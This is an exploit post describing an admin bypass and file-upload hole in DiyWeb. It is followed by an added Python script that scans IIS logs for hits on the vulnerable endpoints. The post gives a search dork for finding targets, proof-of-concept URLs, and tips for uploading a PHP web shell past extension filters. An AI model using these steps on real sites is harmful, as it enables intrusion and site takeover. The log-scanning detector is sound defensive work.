DIYWEB ADMIN BYPASS AND FILE UPLOAD VULNERABILITY

Exploit for DiyWeb File Upload Vulnerability

First, dorking yeah ...

Dork : Power by DiyWeb
inurl:/template.asp?menuid=
Exploit :
diyweb/menu/admin/image_manager.asp
diyweb/menu/admin/AspFIleImg/uploadtester.asp 
PoC :
http://victim.com/diyweb/menu/admin/image_manager.asp
http://victim.com/diyweb/menu/admin/AspFIleImg/uploadtester.asp

The file will be uploaded to http://victim.com/Images/yourfilehere.php

PS: If you can't upload a shell with the .php extension, you can use Tamper Data or Live HTTP Headers (Mozilla add-ons).
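For anyone running DiyWeb, a way to check whether these endpoints have been reached on your own server: the added example below (not part of the original post) scans IIS W3C access-log lines for successful requests to the two admin paths listed above and for script files served from /Images/. The log lines, the field order, the extension list and the rule that only status 200 counts are constructed assumptions.

```python
import re

# Paths taken from the post; compared in lower case because IIS paths are case-insensitive.
ADMIN_PATHS = (
    "/diyweb/menu/admin/image_manager.asp",
    "/diyweb/menu/admin/aspfileimg/uploadtester.asp",
)
# Assumption: extensions that should never be served from an image folder.
SCRIPT_EXT = re.compile(r"^/images/[^/]+\.(php|asp|aspx|asa|cer)$", re.I)
# Assumption: the log uses exactly these W3C fields, in this order.
FIELDS = "date time c-ip cs-method cs-uri-stem sc-status".split()

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-05 10:00:01 203.0.113.7 GET /template.asp 200
2024-01-05 10:02:13 198.51.100.9 GET /diyweb/menu/admin/image_manager.asp 200
2024-01-05 10:02:40 198.51.100.9 POST /diyweb/menu/admin/AspFIleImg/uploadtester.asp 200
2024-01-05 10:03:02 198.51.100.9 GET /Images/x.php 200
2024-01-05 10:04:00 203.0.113.7 GET /Images/logo.jpg 200
2024-01-05 10:05:00 192.0.2.4 GET /diyweb/menu/admin/image_manager.asp 302
"""

def scan(log_text):
    """Return (client_ip, reason, uri) for each request worth reviewing."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C directives
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue  # skip malformed lines
        rec = dict(zip(FIELDS, parts))
        if rec["sc-status"] != "200":
            continue  # assumption: a redirect or error means the page was not served
        uri = rec["cs-uri-stem"].lower()
        if uri in ADMIN_PATHS:
            reason = "upload-post" if rec["cs-method"] == "POST" else "admin-page-served"
            findings.append((rec["c-ip"], reason, rec["cs-uri-stem"]))
        elif SCRIPT_EXT.match(uri):
            findings.append((rec["c-ip"], "script-in-images", rec["cs-uri-stem"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A hit is a prompt for review rather than proof of compromise: a legitimate administrator session also produces 200 responses on the admin pages, so compare the client address and timing against known admin activity.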

